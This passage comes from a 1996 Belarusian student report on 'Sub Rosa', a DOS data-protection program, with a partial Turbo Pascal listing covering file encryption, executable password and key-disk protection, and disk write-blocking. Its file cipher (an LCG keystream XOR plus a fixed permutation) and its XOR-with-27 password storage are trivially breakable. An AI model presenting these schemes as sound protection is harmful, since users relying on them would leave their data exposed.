В программе используются следующие процедуры, функции и объекты:
Shifr (процедура). Зашифрование файлов любого типа. Сначала получаем пароль от пользователя, затем создаем файл зашифрованных данных (*.M&A). Исходный файл считывается блоками по 64 word, кодируется с помощью генератора ПСЧ, затем переставляется в соответствии с таблицей, изображенной на рис. 2. Полученную последовательность записываем в файл с расширением *.M&A и т. д.
DeShifr (процедура). Расшифрование файлов, зашифрованных процедурой Shifr.
Plus (процедура). Установка защиты паролем или по ключевой дискете на программы.
Block (процедура). Защита винчестера от записи.
Passwords (процедура). Изменение пароля входа в программу. Сначала запрашивает старый пароль, затем два раза новый.
TOptions ( объект, потомок объекта TDialog). Выводит диалоговое окно изменения настроек шифрования файлов: удалять или не удалять исходный файл, высвечивать или не высвечивать индикатор процесса шифрования.
CheckExec (процедура). Обрабатывает ошибки DOS.
5. Описание применения программы
Программа предназначена для защиты данных от несанкционированного доступа; в ней реализованы следующие функции:
шифрование файлов;
защита паролем исполняемых файлов;
защита исполняемых файлов с помощью ключевой дискеты;
отслеживание и реакция на ошибки;
изменение паролей;
привязка к BIOS.
Установка системы происходит с ключевой дискеты программой INSTALL.EXE, которая проверяет не была ли установлена система ранее; если нет, то создает на винчестере каталог C:\SUB ROSA и копирует в него файлы системы (Sub Rosa.exe, Block, KeyDisk, Plus, Passw, Setup.res, System.res).
При запуске программы Sub Rosa.exe сначала проверяется наличие всех файлов системы. Если хотя бы один файл изменен или удален, то система работать не будет. Для работы с программой необходимо ввести пароль.
В верхней части экрана находится полоска меню, состоящая из следующих пунктов:
“Файлы”:
— “Выбрать” (выбор файла для работы);
— “Сменить каталог” (смена текущего каталога);
— “Выход в DOS” (временный выход в DOS);
— “Завершение” (завершение работы с программой);
“Защита”:
— “Установить пароль” (защита EXE- и COM-файлов паролем);
— “Блокировать винчестер” (запрет записи любых данных на винчестер);
“Ключевая дискета”:
— “Добавить проверку по ключу” (защита EXE- и COM-файлов с помощью ключевой дискеты);
“Криптография”:
— “Зашифровать файл данных” (зашифрование выбранного файла);
— “Расшифровать файл данных” (расшифрование выбранного файла);
“Настройки”:
— “Криптография” (изменение настроек криптографии);
— “Пароли” (изменение пароля входа в систему);
“О Программе” (информация о программе).
Во всех случаях , кроме блокировки винчестера, сначала необходимо выбрать файл для работы. Для установки защиты паролем или по ключевой дискете выбирается EXE- или COM-файл, для шифрования — файл любого типа.
6. Заключение
В заключении проведем анализ некоторых систем защиты от копирования. Следует отметить, что этот анализ не является исчерпывающим, так как эти системы постоянно развиваются, а также не всегда можно получить исчерпывающее описание алгоритмов — разработчики не стремятся раскрывать принципы их построения.
RANK — пакет защиты от НСД. Этот пакет реализует функцию контроля доступа к EXE- и COM-файлам. Следует отметить, что анализ разграничения доступа к программам ставит под серьезное сомнение возможность реализации такой функции без дополнительных мероприятий.
LATCH — комплекс программ защиты ПЭВМ от НСД. Этот комплекс обеспечивает безопасность данных , хранящихся на винчестере. При несанкционированном доступе происходит “зависание” ПЭВМ или не обнаруживается НЖМД.
Тезис о невозможности обнаружения НЖМД вызывает серьезные сомнения: например, для контроллеров SCSI не требуется определение типа НЖМД в памяти CMOS, так как параметры винчестера могут быть считаны с помощью команды контроллера.
Приложение 1
Листинг программы
Program Sub_Rosa;
Uses
App, Dialogs, Drivers, Menus, MsgBox, Objects,
Validate, Views, Memory, StdDlg, Editors, {Модули Turbo Vision, далее - TV}
CRT, DOS, {Стандартные модули}
SetConf; {Модуль функции привязки к BIOS}
Var
MyRes : TResourceFile; {Переменная файла ресурсов, TV}
FName, MainDir, DName: string; {Переменные работы с файлами и каталогами}
MainPass, Pass : string; {Переменные паролей}
Pos : string[3];
FilePass : file of char; {Переменная файла паролей}
OptFile, OptInd : word; {Переменные опций}
Int09_Save : pointer; {Переменная адреса 09h прерывания}
Const {Константы кодов команд, TV}
cmAboutBox = 700; {Окно "О Программе"}
cmCode = 1001; {Кодировать файл}
cmDeCode = 1002; {Декодировать файл}
cmSetPass = 1005; {Установить пароль на вход в систему}
cmLockDisk = 1006; {Запретить доступ к винчестеру}
cmOptions = 1007; {Опции криптографии}
cmKeyDisk = 1008; {Ключевая дискета}
cmPasswords = 1009; {Пароль на исполняемый файл}
cmChangePass= 1010; {Сменить пароль на вход в систему}
SetPass = 'passw.com';
KeyDisk = 'keydisk.com';
RMenuBar: TStreamRec = ( {Запись для работы с потоком, TV}
ObjType: 2000;
VmtLink: Ofs(TypeOf(TMenuBar)^);
Load: @TMenuBar.Load;
Store: @TMenuBar.Store);
Type
{Установка опций криптографии}
POptions = ^TOptions;
TOptions = object(TDialog)
constructor Init;
end;
{Объект для работы с текстом}
PMyStaticText = ^TMyStaticText;
TMyStaticText = object(TStaticText)
function GetPalette: PPalette; virtual; {Переопределение палитры}
end;
{Объекты для работы с файлами и каталогами}
PMyFDialog = ^TMyFDialog;
TMyFDialog = object(TFileDialog)
function GetPalette: PPalette; virtual;
end;
PMyFileDialog = ^TMyFileDialog;
TMyFileDialog = object(TMyFDialog)
constructor Init(AWildCard: tWildStr; const ATitle,
InputName: string; AOptions: Word; HistoryId: Byte);
end;
PDirDialog = ^TDirDialog;
TDirDialog = object(TChDirDialog)
function GetPalette: PPalette; virtual;
end;
PMyChDirDialog = ^TMyChDirDialog;
TMyChDirDialog = object(TDirDialog)
constructor Init(AOptions: Word; HistoryId: Word);
procedure SetUpDialog;
function Valid(Command: Word): Boolean; virtual;
end;
{Установка основного фона программы}
PMyBackground = ^TMyBackground;
TMyBackground = object(TBackground)
Text: TTitleStr;
constructor Init(var Bounds: TRect; AText: TTitleStr);
procedure Draw; virtual;
end;
PMyDesktop = ^TMyDesktop;
TMyDesktop = object(TDesktop)
procedure InitBackground; virtual;
end;
{Объект "О Программе"}
PAboutBox = ^TAboutBox;
TAboutBox = object(TDialog)
constructor Init;
end;
{Основной объект}
PMyApp = ^TMyApp;
TMyApp = object(TApplication)
constructor Init; {инициализация}
destructor Done; virtual; {завершение работы}
procedure HandleEvent(var Event: TEvent); virtual; {обработка событий}
procedure InitMenuBar; virtual; {инициализация меню}
procedure InitDeskTop; virtual; {инициализация рабочего поля}
procedure InitStatusLine; virtual; {инициализация строки состояния}
procedure FileOpen(WildCard: PathStr); {окно для работы с файлами}
function GetPalette: PPalette; virtual; {изменение стандартной палитры}
end;
{ Русифицированная функция формирования сообщения }
function MyMessageBoxRect(var R: TRect;
const Msg: string; Params: pointer;
AOptions: word): word;
const
ButtonName: array[0..3] of string[6] = ('Ага', 'Нека', 'Ага', 'Нека');
Commands: array[0..3] of Word = (cmYes, cmNo, cmOK, cmCancel);
Titles: array[0..3] of string[11] =
('Предупреждение', 'Ошибка', 'Информация', 'Подтверждение');
var
I, X : integer;
Dialog : PDialog;
Control: PView;
S : string;
begin
Dialog:= New(PDialog, Init(R, Titles[AOptions and $3]));
with Dialog^ do
begin
Options:= Options or ofCentered;
R.Assign(3, 2, Size.X - 2, Size.Y - 3);
FormatStr(S, Msg, Params^);
Insert(New(PStaticText, Init(R, S)));
X:= -2;
R.Assign(0, 0, 10, 2);
for I:= 0 to 3 do
if AOptions and ($0100 shl I) <> 0 then
Inc(X, R.B.X - R.A.X + 2);
X:= (Size.X - X) shr 1;
for I:= 0 to 3 do
if AOptions and ($0100 shl I) <> 0 then
begin
Control:= New(PButton, Init(
R, ButtonName[I], Commands[i], bfNormal));
Insert(Control);
Control^.MoveTo(X, Size.Y - 3);
Inc(X, Control^.Size.X + 2);
end;
SelectNext(False);
end;
if AOptions and mfInsertInApp = 0 then
MyMessageBoxRect:= DeskTop^.ExecView(Dialog)
else
MyMessageBoxRect:= Application^.ExecView(Dialog);
Dispose(Dialog, Done);
end;
{ Русифицированная функция формирования сообщения
стандартного размера }
function MyMessageBox(const Msg: String;
Params: Pointer; AOptions: Word): Word;
var
R: TRect;
begin
R.Assign(0, 0, 40, 9);
MyMessageBox:= MyMessageBoxRect(R, Msg, Params, AOptions);
end;
function GetCurDir: DirStr;
var
CurDir: DirStr;
begin
GetDir(0, CurDir);
if Length(CurDir) > 3 then
begin
Inc(CurDir[0]);
CurDir[Length(CurDir)]:= '\';
end;
GetCurDir:= CurDir;
end;
{Процедура инициализации окна работы с файлами}
procedure TMyApp.FileOpen(WildCard: PathStr);
var
FileName: FNameStr;
begin
FileName:= '*.*';
if ExecuteDialog(New(PMyFileDialog, Init(
WildCard, 'Открыть файл', 'Имя', fdOpenButton,
100)), @FileName) <> cmCancel then FName:=FileName;
{открыть файл, потом...}
end;
{****************************************************************************}
{*----------============= К Р И П Т О Г Р А Ф И Я ================----------*}
{****************************************************************************}
{Шифрование файлов}
procedure Shifr(InputFileName: string);
const
A = 5; {Константы для}
C = 27; {генератора}
M = 65536; {псевдослучайных чисел, далее - ПСЧ}
var
TempFile : file of byte;
InpF, OutF : file of word; {файлы на входе и выходе}
Password, Password1 : string; {переменные для работы с паролями}
OutputFileName, Exten : string; {переменные имен файлов}
I, J, K, tmp : byte; {переменные кодирования}
Temp, SCode, TByte, Code: word;
Position : LongInt; {переменные данных о процессе}
NowPos : real;
TPassword : array [1..255] of word;
MasByte, Mas, MasEnd, PS: array [1..64] of word; {массивы перестановок}
T : array [0..64] of word;
DirInfo, DirInfo1 : SearchRec; {данные о файле}
begin
if length(FName) > 3 then {Файл выбран?}
begin
{Получить пароль}
Password := '';
Password1 := '';
InputBox('П А Р О Л Ь', ' Введите пароль:', Password, 255);
InputBox('П А Р О Л Ь', 'Введите пароль еще раз:', Password1, 255);
if (Password = Password1) and (length(Password)<>0) then
begin
{Преобразовать файл}
FindFirst(InputFileName, AnyFile, DirInfo);
if DOSError = 0 then
begin
if DirInfo.Size mod 2 = 1 then
begin
assign(TempFile, InputFileName);
reset(TempFile);
while not EOF(TempFile) do read(TempFile, tmp);
tmp := 255;
write(TempFile, tmp);
close(TempFile);
end;
{Преобразовать имя файла}
Position := 0;
assign(InpF, InputFileName);
reset(InpF);
for i := length(InputFileName) downto 1 do
if InputFileName[i] = '.' then
begin
OutputFileName := copy(InputFileName, 1, i) + 'M&A';
break;
end;
assign(OutF, OutputFileName);
rewrite(OutF);
for i:= 0 to length(InputFileName) do
if InputFileName[length(InputFileName) - i] = '.' then
case i of
0: Exten := chr(0) + chr(0) + chr(0);
1: Exten := copy(FName, length(FName)-2, i) + chr(0) + chr(0);
2: Exten := copy(FName, length(FName)-2, i) + chr(0)
else Exten := copy(FName, length(FName)-2, 3)
end;
for i := 1 to 3 do
begin
Temp := ord(Exten[i]);
Write(OutF, Temp);
end;
{Начать шифрование}
k := 1;
repeat
begin
{Считать из исходного файла блок размером 64*word}
for i:=1 to 64 do
If EOF(InpF) then MasByte[i] := 0 else Read(InpF, MasByte[i]);
Mas := MasByte;
T[0] := ord(Password[k]);
if k < length(Password) then inc(k) else k := 1;
for i:= 1 to 64 do
begin
{Получить текущую позицию процесса}
NowPos := 100*Position/DirInfo.Size;
inc(Position, 2);
if NowPos > 100 then NowPos := 100;
Str(Round(NowPos):3, Pos);
if OptInd = 0 then
begin
GoToXY(77, 1);
Write(Pos + '%');
end;
{Шифровать с помощью ПСЧ}
Code:=Mas[i];
T[i] := (A * T[i-1] + C) mod M;
Code:=T[i] xor Code;
Mas[i] := Code;
end;
for i:=1 to 8 do { Конечная перестановка }
for j:=1 to 8 do
case i of
1: MasEnd[8*(j-1)+i] := Mas[41-j];
2: MasEnd[8*(j-1)+i] := Mas[09-j];
3: MasEnd[8*(j-1)+i] := Mas[49-j];
4: MasEnd[8*(j-1)+i] := Mas[17-j];
5: MasEnd[8*(j-1)+i] := Mas[57-j];
6: MasEnd[8*(j-1)+i] := Mas[25-j];
7: MasEnd[8*(j-1)+i] := Mas[65-j];
8: MasEnd[8*(j-1)+i] := Mas[33-j]
end;
for i:= 1 to 64 do Write(OutF, MasEnd[i]);
end;
until eof(InpF);
MyMessageBox('Файл '+ InputFileName + ' зашифрован с именем ' +
OutputFileName, nil, mfInformation+mfOkButton);
Close(InpF);
if OptFile = 1 then Erase(InpF);
Close(OutF);
end
else MyMessageBox('Файл '+ InputFileName + ' не существует!',
nil, mfInformation+mfOkButton);
end
else MyMessageBox(' Ошибка ввода пароля!!!', nil,
mfError+mfOkButton);
end
else MyMessageBox(' Файл не выбран!!!', nil, mfError+mfOkButton);
end;
procedure DeShifr(InputFileName: String);
const
A = 5;
C = 27;
M = 65536;
var
InpF, OutF : file of word;
Password, OutputFileName : string;
Password1 : string;
Exten : string[3];
SCode, Temp, Ext, TByte, Code: word;
I, J, K : byte;
Position : LongInt;
NowPos : real;
TPassword : array [1..255] of word;
MasByte, Mas, MasEnd, PS : array [1..64] of word;
T : array [0..64] of word;
DirInfo : SearchRec;
begin
if (length(InputFileName) > 3) and
(copy(InputFileName, length(InputFileName)-2, 3) = 'M&A') then
begin
Password := '';
Password1 := '';
InputBox('П А Р О Л Ь', ' Введите пароль:', Password, 255);
InputBox('П А Р О Л Ь', 'Введите пароль еще раз:', Password1, 255);
if (Password = Password1) and (length(Password)<>0) then
begin
FindFirst(InputFileName, AnyFile, DirInfo);
if DOSError = 0 then
begin
Assign(InpF, InputFileName);
Reset(InpF);
Position := 0;
Exten := '';
for i:= 1 to 3 do
begin
Read(InpF, Temp);
Exten := Exten + chr(Temp);
end;
for i := length(InputFileName) downto 1 do
if InputFileName[i] = '.' then
begin
OutputFileName := copy(InputFileName, 1, i) + Exten;
break;
end;
Assign(OutF, OutputFileName);
Rewrite(OutF);
for i := 1 to length(Password) do TPassword[i]:=ord(Password[i]);
k := 1;
repeat
begin
for i:=1 to 64 do Read(InpF, MasByte[i]);
for i:=1 to 8 do { начальная перестановка }
for j:=1 to 8 do
case i of
1: Mas[8*(i-1)+j]:=MasByte[66-8*j];
2: Mas[8*(i-1)+j]:=MasByte[68-8*j];
3: Mas[8*(i-1)+j]:=MasByte[70-8*j];
4: Mas[8*(i-1)+j]:=MasByte[72-8*j];
5: Mas[8*(i-1)+j]:=MasByte[65-8*j];
6: Mas[8*(i-1)+j]:=MasByte[67-8*j];
7: Mas[8*(i-1)+j]:=MasByte[69-8*j];
8: Mas[8*(i-1)+j]:=MasByte[71-8*j]
end;
T[0] := ord(Password[k]);
if k < length(Password) then inc(k) else k := 1;
for i:= 1 to 64 do
begin
NowPos := 100*Position/DirInfo.Size;
inc(Position, 2);
If NowPos > 100 then NowPos := 100;
Str(Round(NowPos):3, Pos);
if OptInd = 0 then
begin
GoToXY(77, 1);
Write(Pos + '%');
end;
T[i] := (A * T[i-1] + C) mod M;
Code:=Mas[i];
Code:=T[i] xor Code;
Mas[i] := Code;
end;
MasEnd := Mas;
for i := 1 to 64 do Write(OutF, MasEnd[i]);
end;
until eof(InpF);
GotoXY(77, 1);
write('100%');
MyMessageBox('Файл '+ InputFileName + ' расшифрован в ' +
OutputFileName, nil, mfInformation+mfOkButton);
Close(InpF);
if OptFile = 1 then Erase(InpF);
Close(OutF);
end
else MyMessageBox('Файл '+ InputFileName + ' не существует!',
nil, mfInformation+mfOkButton);
end
else MyMessageBox(' Ошибка ввода пароля!!!', nil,
mfError+mfOkButton);
end
else MyMessageBox(' Файл не выбран!!!', nil,
mfError+mfOkButton);
end;
{Опции криптографии}
constructor TOptions.Init;
var
R : TRect;
Q, Q1: PView;
Butt : TRadioButtons;
begin
R.Assign(0, 0, 60, 11);
inherited Init(R, 'Криптография');
Options := Options or ofCentered;
R.Assign(10, 8, 20, 10);
Insert(New(PButton, Init(R, '~А~га', cmOK, bfDefault)));
R.Assign(40, 8, 50, 10);
Insert(New(PButton, Init(R, '~Н~ека', cmCancel, bfNormal)));
R.Assign(2, 2, 25, 3);
Insert(New(PLabel, Init(R, 'Исходный файл:', Q)));
R.Assign(5, 4, 21, 6);
Q:=New(PRadioButtons, Init(R,
NewSItem('~Н~е удалять',
NewSItem('~У~далять', nil))));
Insert(Q);
R.Assign(27, 2, 45, 3);
Insert(New(PLabel, Init(R, 'Индикатор:', Q1)));
R.Assign(30, 4, 50, 6);
Q1:=New(PRadioButtons, Init(R,
NewSItem('~В~ысвечивать',
NewSItem('~Н~е высвечивать', nil))));
Insert(Q1);
end;
{Изменение пароля на вход в систему}
procedure Passwords;
var
Ps, Ps1: string;
I : byte;
tmp : char;
begin
Ps := '';
Ps1 := '';
InputBox('П А Р О Л Ь', 'Введите пароль:', Ps, 255);
for i:= 1 to length(Ps) do Ps[i] :=chr(ord(Ps[i]) xor 27);
if Ps <> Pass then
begin
MyMessageBox(' Неверный пароль!!!', nil, mfError+mfOkButton);
ClrScr;
writeln('Несанкционированный доступ!');
Halt;
end;
InputBox('И З М Е Н Е Н И Е П А Р О Л Я',
'Введите новый пароль:', Ps, 255);
InputBox('И З М Е Н Е Н И Е П А Р О Л Я',
' Повторите ввод:', Ps1, 255);
if (Ps = Ps1) and (Ps <> '') then
begin
Assign(FilePass, 'system.res');
Rewrite(FilePass);
for i := 1 to length(PS) do
begin
tmp := chr(ord(Ps[i]) xor 27);
Write(FilePass, tmp);
end;
Close(FilePass);
end
else MyMessageBox(' Ошибка ввода пароля!!!', nil, mfError+mfOkButton);
end;
{Обработка ошибок}
procedure CheckExec;
var
St: string;
begin
Str(DOSError, St);
case DOSError of
2: MyMessageBox(' Ошибка DOS № ' +
St + ' "Файл не найден"',
nil, mfError + mfOkButton);
3: MyMessageBox(' Ошибка DOS № ' +
St + ' "Путь не найден"',
nil, mfError + mfOkButton);
5: MyMessageBox(' Ошибка DOS № ' +
St + '"Неверный код доступа к файлу"',
nil, mfError + mfOkButton);
6: MyMessageBox(' Ошибка DOS № ' +
St + '"Неверный код системного обработчика файла"',
nil, mfError + mfOkButton);
8: MyMessageBox(' Ошибка DOS № ' +
St + ' "Недостаточно памяти"',
nil, mfError + mfOkButton);
10: MyMessageBox(' Ошибка DOS № ' +
St + ' "Неверная среда"',
nil, mfError + mfOkButton);
11: MyMessageBox(' Ошибка DOS № ' +
St + ' "Неправильный формат"',
nil, mfError + mfOkButton);
18: MyMessageBox(' Ошибка DOS № ' +
St + '"Нет свободных обработчиков для файлов"',
nil, mfError + mfOkButton);
end;
end;
procedure MakeComFile(k: byte);
const
S : array [1..4] of string = ('c:\sub_rosa\plus.', 'c:\sub_rosa\passw.',
'c:\sub_rosa\block.', 'c:\sub_rosa\keydisk.');
Size : array [1..4] of word = (1068, 204, 617, 2118);
Inden: array [1..4, 1..3] of byte = ((ord('ы'), 26 , ord('Р')),
(ord('ы'), 39 , ord('Р')),
(ord('щ'), ord('Й'), ord('_')),
(ord('щ'), ord('А'), ord('_')));
var
I, Tmp : byte;
F : array [1..4, 1..2] of file ;
M : array [1..2200] of byte ;
NumRead, NumWritten: Word;
begin
assign(F[k, 1], S[k]); reset(F[k, 1], 1);
assign(F[k, 2], S[k]+'com'); rewrite(F[k, 2], 1);
for i := 1 to 3 do
begin
BlockRead(F[k, 1], tmp, 1, NumRead);
BlockWrite(F[k, 2], Inden[k, i], 1, NumWritten);
end;
BlockRead(F[k, 1], M, Size[k]-3, NumRead);
BlockWrite(F[k, 2], M, Size[k]-3, NumWritten);
close(F[k, 1]); close(F[k, 2]);
end;
procedure DelComFile(k: byte);
const
{ S: array [1..4] of string =
('plus.com', 'passw.com', 'block.com', 'keydisk.com');}
S : array [1..4] of string = ('c:\sub_rosa\plus.com',
'c:\sub_rosa\passw.com',
'c:\sub_rosa\block.com',
'c:\sub_rosa\keydisk.com');
var
F: array [1..4] of file;
begin
Assign(F[k], S[k]);
Erase(F[k]);
end;
{****************************************************************************}
{*----------=========== Д О П И С А Т Ь К Ф А Й Л У ==========----------*}
{****************************************************************************}
procedure Plus(WhatDo: string);
var
FileStr, Err: string;
CmdLine : string;
I : byte;
FileName : FNameStr;
Regs : Registers;
begin
{Проверка условий}
if Length(FName) > 3 then
begin
if (copy(FName, length(FName)-2, 3) = 'EXE') or
(copy(FName, length(FName)-2, 3) = 'COM')
then
begin
{Преобразование имени файла}
for i:= length(fname) downto 1 do
if fname[i] = '\' then
begin
CmdLine := copy(FName, i+1, length(FName) - i);
break;
end;
for i := 1 to length(CmdLine) do
if CmdLine[i] in ['A'..'Z'] then
CmdLine[i] := chr(ord(CmdLine[i]) + 32);
for i := 1 to length(MainDir) do
if MainDir[i] in ['A'..'Z'] then
MainDir[i] := chr(ord(MainDir[i]) + 32);
MakeComFile(1);
If WhatDo = SetPass then MakeComFile(2);
If WhatDo = KeyDisk then MakeComFile(4);
{Выполнить дописывание}
SwapVectors;
Exec( MainDir + 'plus.com ', CmdLine + ' ' + MainDir + WhatDo);
SwapVectors;
DelComFile(1);
If WhatDo = SetPass then DelComFile(2);
If WhatDo = KeyDisk then DelComFile(4);
{Обработчик ошибок}
if DosError <> 0 then
CheckExec
else
begin
regs.ah := $4D;
with regs do
msdos(regs);
case Regs.AH of
0 : MyMessageBox(' Файл ' + FName + ' защищен.',
nil, mfInformation + mfOkButton);
1 : MyMessageBox(' Ctrl-C или Ctrl-Break.',
nil, mfError + mfOkButton);
2 : MyMessageBox(' Критическая ошибка устройства.',
nil, mfError + mfOkButton);
3 : MyMessageBox(' TSR - программа.',
nil, mfError + mfOkButton);
end;
end;
end
else MyMessageBox(' Ошибка выбора файла !!! ',
nil, mfError + mfOkButton);
end
else MyMessageBox(' Файл не выбран!!! ',
nil, mfError + mfOkButton);
end;
{****************************************************************************}
{*----------===== Б Л О К И Р О В К А В И Н Ч Е С Т Е Р А ======----------*}
{****************************************************************************}
procedure LockDisk;
label
end_;
var
Regs: registers;
Err : string;
Inst: byte;
begin
{Проверка наличи программы в памяти}
asm
push ax
push dx
mov Inst, 0
mov ax,1059h
mov dx,2517h
int 13h
cmp ax,2517h
jne End_
cmp dx,1059h
jne End_
mov Inst, 1
End_: pop dx
pop ax
end;
if Inst = 0 then
begin
MakeComFile(3);
{Установить защиту}
SwapVectors;
SetIntVec($09, Int09_Save);
Exec(MainDir + 'block.com', '');
GetIntVec($09, Int09_Save);
SwapVectors;
{Обраюотчик ошибок}
if DosError <> 0 then
CheckExec
else
begin
regs.ah := $4D;
with regs do
msdos(regs);
case Regs.AH of
0 : MyMessageBox(' Ненормальное завершение.',
nil, mfError + mfOkButton);
1 : MyMessageBox(' Ctrl-C или Ctrl-Break.',
nil, mfError + mfOkButton);
2 : MyMessageBox(' Критическая ошибка устройства.',
nil, mfError + mfOkButton);
3 : MyMessageBox(' Винчестер блокирован.',
nil, mfInformation + mfOkButton); { TSR }
end;
end;
end
else MyMessageBox(' Защита уже установлена.',
nil, mfError + mfOkButton);
end;
{Изменить стандартную палитру}
function TDirDialog.GetPalette: PPalette;
const
{Синяя палитра}
CMyCluster = #64#65#66#67#68#69#70#71#72#73#74#75#76#77#78#79#80#81#82+
#83#84#85#86#87#88#89#90#91#92#93#94#95;
P: string [32] = CMyCluster;
begin
GetPalette := @P;
end;
{Окно работы с каталогами}
constructor TMyChDirDialog.Init(AOptions: Word; HistoryId: Word);
var
R : TRect;
ScrollBar: PScrollBar;
CurDir : DirStr;
begin
{ Создание окна }
R.Assign(16, 2, 64, 20);
TDialog.Init(R, 'Изменить катлог');
Options := Options or ofCentered;
{ Строка ввода имени каталога }
R.Assign(3, 3, 30, 4);
DirInput := New(PInputLine, Init(R, 68));
Insert(DirInput);
R.Assign(2, 2, 17, 3);
Insert(New(PLabel, Init(
R, '~И~мя каталога', DirInput)));
{ Список каталогов }
R.Assign(32, 6, 33, 16);
ScrollBar := New(PScrollBar, Init(R));
Insert(ScrollBar);
R.Assign(3, 6, 32, 16);
DirList := New(PDirListBox, Init(R, ScrollBar));
Insert(DirList);
R.Assign(2, 5, 19, 6);
Insert(New(PLabel, Init(
R, '~Д~ерево каталогов', DirList)));
{ Формирование кнопок }
R.Assign(35, 6, 45, 8);
OkButton := New(PButton, Init(
R, '~А~га', cmOK, bfDefault));
Insert(OkButton);
Inc(R.A.Y,3); Inc(R.B.Y,3);
ChDirButton := New(PButton, Init(
R, '~С~мена', cmChangeDir, bfNormal));
Insert(ChDirButton);
Inc(R.A.Y,3); Inc(R.B.Y,3);
Insert(New(PButton, Init(
R, '~Н~ека', cmCancel, bfNormal)));
if AOptions and cdNoLoadDir = 0 then SetUpDialog;
SelectNext(False);
end;
procedure TMyChDirDialog.SetUpDialog;
var
CurDir: DirStr;
begin
if DirList <> nil then
begin
CurDir := GetCurDir;
DirList^.NewDirectory(CurDir);
if (Length(CurDir) > 3) and (CurDir[Length(CurDir)] = '\') then
CurDir := Copy(CurDir,1,Length(CurDir)-1);
if DirInput <> nil then
begin
DirInput^.Data^ := CurDir;
DirInput^.DrawView;
end;
end;
end;
function TMyChDirDialog.Valid(Command: Word): Boolean;
var
P: PathStr;
begin
Valid := True;
if Command = cmOk then
begin
P := FExpand(DirInput^.Data^);
if (Length(P) > 3) and (P[Length(P)] = '\') then
Dec(P[0]);
{$I-}
ChDir(P);
if IOResult <> 0 then
begin
MyMessageBox(' Неправильный каталог!',
nil, mfError + mfOkButton);
Valid := False;
end;
{$I+}
end;
end;
{Инициализировать рабочее поле}
constructor TMyBackground.Init(var Bounds: TRect; AText: TTitleStr);
begin
inherited Init(Bounds, ' ');
Text := AText;
while Length(Text) < SizeOf(TTitleStr) - 1 do
Text := Text + AText;
end;
procedure TMyBackground.Draw;
var
DrawBuffer: TDrawBuffer;
begin
MoveStr(DrawBuffer, Text, GetColor(1));
WriteLine(0, 0, Size.X, Size.Y, DrawBuffer);
end;
procedure TMyDesktop.InitBackground;
var
R: TRect;
begin
GetExtent(R);
Background := New(PMyBackground, Init(R, '___'));
end;
{Изменить стандартную палитру}
function TMyStaticText.GetPalette: PPalette;
const
{Синяя палитра}
CMyCluster = #64#65#66#67#68#69#70#71#72#73#74#75#76#77#78#79#80#81#82+
#83#84#85#86#87#88#89#90#91#92#93#94#95;
P: string [32] = CMyCluster;
begin
GetPalette := @P;
end;
{Окно "О Программе"}
constructor TAboutBox.Init;
var
R: TRect;
begin
R.Assign(0, 0, 30, 16);
inherited Init(R, 'О программе');
Options := Options or ofCentered;
R.Assign(10, 13, 20, 15);
Insert(New(PButton, Init(R, '~А~га', cmOK, bfDefault)));
R.Assign(11, 2, 19, 3);
Insert(New(pMyStaticText, Init(R, 'Sub Rosa')));
R.Assign(1, 4, 29, 5);
Insert(New(pStaticText, Init(R, 'Система защиты данных от НСД')));
R.Assign(5, 5, 29, 6);
Insert(New(pStaticText, Init(R, 'выполнена учащимися')));
R.Assign(10, 6, 29, 7);
Insert(New(pStaticText, Init(R, 'гр. 4641')));
R.Assign(6, 7, 29, 8);
Insert(New(pStaticText, Init(R, 'Егановым Максимом')));
R.Assign(14, 8, 22, 9);
Insert(New(pStaticText, Init(R, 'и')));
R.Assign(6, 9, 29, 10);
Insert(New(pStaticText, Init(R, 'Юзефовичем Артемом')));
R.Assign(6, 11, 29, 12);P>
Insert(New(pStaticText, Init(R, 'МГВРК, Минск, 1996')));
end;
{Работа программы начинается здесь...}
constructor TMyApp.Init;
var
ReturnVal, i : Word;
DirInfo, DirInfo1, DirInfo2 : SearchRec;
DirInfo3, DirInfo4, DirInfo5: SearchRec;
Pas : string;
st : char;
begin
OptInd := 1;
{Инициализировать файл ресурсов}
MyRes.Init(New(PBufStream, Init('Setup.res', stOpen, 1024)));
if MyRes.Stream^.Status <> stOK then
begin
Write('Нарушение целостности!');
halt(1);
end;
RegisterType(RMenuBar);
{Проверить целостность системы}
MainDir := GetCurDir;
FindFirst('plus', AnyFile, DirInfo);
FindFirst('passw', AnyFile, DirInfo1);
FindFirst('block', AnyFile, DirInfo2);
FindFirst('keydisk', AnyFile, DirInfo3);
FindFirst('setup.res', AnyFile, DirInfo4);
if (DOSError = 0) and (DirInfo.Size = 1068) and (DirInfo1.Size = 204) and
(DirInfo2.Size = 617) and (DirInfo3.Size = 2118) and
(DirInfo4.Size = 522) then
begin
{Получить пароль}
Assign(FilePass, 'system.res');
Reset(FilePass);
Pass := '';
while not EOF(FilePass) do
begin
read(FilePass, st);
Pass := Pass + st;
end;
Close(FilePass);
{Инициализировать систему}
TApplication.Init;
Pas := '';
ReturnVal := ExecuteDialog(New(PAboutBox, Init), nil);
InputBox('П А Р О Л Ь', 'Введите пароль:', Pas, 255);
for i:= 1 to length(Pas) do Pas[i] :=chr(ord(Pas[i]) xor 27);
if Pas <> Pass then
begin
MyMessageBox(' Неверный пароль!!!', nil, mfError+mfOkButton);
ClrScr;
writeln('Несанкционированный доступ!');
Halt;
end;
end
else
begin
writeln('Нарушение целостности!');
Halt;
end;
end;
{Завершение работы}
destructor TMyApp.Done;
begin
TApplication.Done;
MyRes.Done;
end;
{Обработка событий}
procedure TMyApp.HandleEvent(var Event: TEvent);
procedure ChangeDir;
var
D: PMyChDirDialog;
begin
D:= New(PMyChDirDialog, Init(cdNormal, 101));
ExecuteDialog(D, nil);
end;
var
ReturnVal: Word;
regs : Registers;
R : TRect;
begin
inherited HandleEvent(Event);
case Event.What of
evCommand:
begin
case Event.Command of
cmAboutBox : ReturnVal :=
ExecuteDialog(New(PAboutBox, Init), nil);
cmOpen : FileOpen('*.*');
cmChangeDir : ChangeDir;
cmSetPass : Plus(SetPass);
cmKeyDisk : Plus(KeyDisk);
cmCode : Shifr(FName);
cmDeCode : DeShifr(FName);
cmLockDisk : LockDisk;
cmOptions : ReturnVal :=
ExecuteDialog(New(POptions, Init), @OptFile);
cmPasswords : Passwords
end;
ClearEvent(Event);
end;
end;
end;
{Инициализировать меню}
procedure TMyApp.InitMenuBar;
var
R: TRect;
begin
{Получить меню из файла ресурсов по ключу "Config" - функция получения}
{даты BIOS; модуль SetConf}
MenuBar := PMenuBar(MyRes.Get(Config));
if MenuBar = nil then
begin
Write(' Нелегальная копия!!!');
halt(1);
end;
end;
{Инициализировать рабочее поле}
procedure TMyApp.InitDesktop;
var
R: TRect;
begin
